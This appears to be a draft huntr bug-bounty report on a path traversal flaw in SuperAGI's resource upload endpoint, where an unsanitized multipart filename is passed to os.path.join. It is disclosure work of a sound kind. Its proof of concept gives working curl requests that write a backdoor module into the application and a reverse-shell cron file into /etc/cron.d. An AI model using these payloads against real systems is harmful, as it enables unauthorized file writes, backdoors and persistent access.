# SuperAGI — Path Traversal in resource file upload
STATUS: DRAFT
program: SuperAGI | platform: huntr | repo: TransformerOptimus/SuperAGI | commit: c3c1982e

````
Repository URL: https://github.com/TransformerOptimus/SuperAGI
Package Manager: pip
CVSS: Attack Vector: Network
Title: SuperAGI — Path Traversal in resource file upload
Description:

## huntr Form Fields

```
Package Manager: pip
Version Affected: latest (commit c3c1982e)
Vulnerability Type: Path Traversal
CVSS:
  Attack Vector: Network
  Attack Complexity: Low
  Privileges Required: Low
  User Interaction: None
  Scope: Unchanged
  Confidentiality: None
  Integrity: High
  Availability: High
Title: Arbitrary file write via path traversal in resource upload endpoint
```

### Description

# Description

The resource upload endpoint at `/api/resources/add/{agent_id}` constructs a file path using the multipart upload's `filename` field without sanitization. The `file.filename` from the multipart form data is passed directly to `os.path.join()`, allowing an attacker to write files to arbitrary locations on the filesystem.

In `superagi/controllers/resources.py` line 71, the filename from the uploaded file is joined directly into the save path, and the file contents are written without any path validation.

The endpoint validates the `name` parameter against an allowlist of extensions (`.pdf`, `.docx`, `.txt`, etc.), but this validation applies to the separate `name` form field — NOT to `file.filename` from the actual multipart file upload. The `file.filename` value is used for the filesystem path and is completely unsanitized.

In Python, `os.path.join("/base/dir", "../../etc/cron.d/backdoor")` resolves to `/etc/cron.d/backdoor`, enabling writes outside the intended upload directory.

# Proof of Concept

1. Deploy SuperAGI and authenticate (obtain a valid session/API key)
2. Create an agent to get a valid `agent_id`
3. Send a multipart file upload with a traversal filename:

```bash
curl -X POST "http://localhost:3000/api/resources/add/1" \
  -H "Authorization: Bearer <token>" \
  -F "file=@malicious.py;filename=../../../app/superagi/controllers/backdoor.py" \
  -F "name=legit.pdf" \
  -F "size=100" \
  -F "type=application/pdf"
```

4. The file is written to `/app/superagi/controllers/backdoor.py` (or any path the process user can write to), escaping the intended resource upload directory.

5. For direct impact, overwrite an existing Python module that gets imported at runtime, or write a cron job:

```bash
curl -X POST "http://localhost:3000/api/resources/add/1" \
  -H "Authorization: Bearer <token>" \
  -F "file=@crontab;filename=../../../../etc/cron.d/reverse_shell" \
  -F "name=notes.txt" \
  -F "size=50" \
  -F "type=text/plain"
```

### Impact

This vulnerability allows an authenticated user to write arbitrary files anywhere on the server filesystem (limited by process permissions). An attacker can overwrite application source code to inject backdoors, write cron jobs for persistent access, plant webshells, or corrupt configuration files causing denial of service. In the default Docker deployment, the process runs as root, so the entire container filesystem is writable.

### Occurrences

```
Permalink: https://github.com/TransformerOptimus/SuperAGI/blob/c3c1982e7bd6a11cfed53c5a193ea502f924b1b6/superagi/controllers/resources.py#L71
Description: file.filename from multipart upload used directly in os.path.join() without path traversal sanitization — the name parameter's extension validation does not apply to file.filename
```

### References

```
URL: https://cwe.mitre.org/data/definitions/22.html
Name: CWE-22: Improper Limitation of a Pathname to a Restricted Directory

URL: https://owasp.org/www-community/attacks/Path_Traversal
Name: OWASP — Path Traversal Attack
```
````